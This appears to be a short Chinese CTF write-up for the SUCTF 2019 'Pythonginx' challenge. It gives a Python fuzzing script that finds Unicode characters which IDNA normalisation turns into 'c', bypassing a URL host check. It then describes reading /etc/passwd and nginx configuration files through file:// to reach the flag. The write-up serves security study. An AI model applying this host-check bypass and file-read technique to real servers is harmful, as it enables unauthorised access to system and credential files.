題目地址 https://buuoj.cn/challenges#[SUCTF%202019]Pythonginx
打開題目可以看到源碼
這裏利用了python urllib.parse urlunsplit() 函數會把奇奇怪怪的(ⓒ ℂ ℭ)變成正常的C
至於怎麼找到這些奇奇怪怪的C,
from flask import Flask, Blueprint, request, Response, escape ,render_template
from urllib.parse import urlsplit, urlunsplit, unquote
from urllib import parse
import urllib.request
def fuzzing():
for i in range(65536):
uni = chr(i)
url = "http://suctf.c{}".format(uni)
try:
if getUrl(url):
print("str:"+uni+" unicode: \\u"+str(hex(i))[2:])
exit()
except:
pass
pass
def getUrl(url):
host = parse.urlparse(url).hostname
print(host)
if host == 'suctf.cc':
return False
parts = list(urlsplit(url))
host = parts[1]
print(host)
if host == 'suctf.cc':
return False
newhost = []
for h in host.split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
#去掉 url 中的空格
finalUrl = urlunsplit(parts).split(' ')[0]
print(finalUrl)
host = parse.urlparse(finalUrl).hostname
print(host)
if host == 'suctf.cc':
return True
else:
return False
fuzzing()
然後使用file://協議來讀取etc/passwd看看
然而讀取根目錄下flag或flag.txt是不行的,沒有這個
但題目說了nginx,那麼查一下nginx配置文件,
就找到flag了
比如說F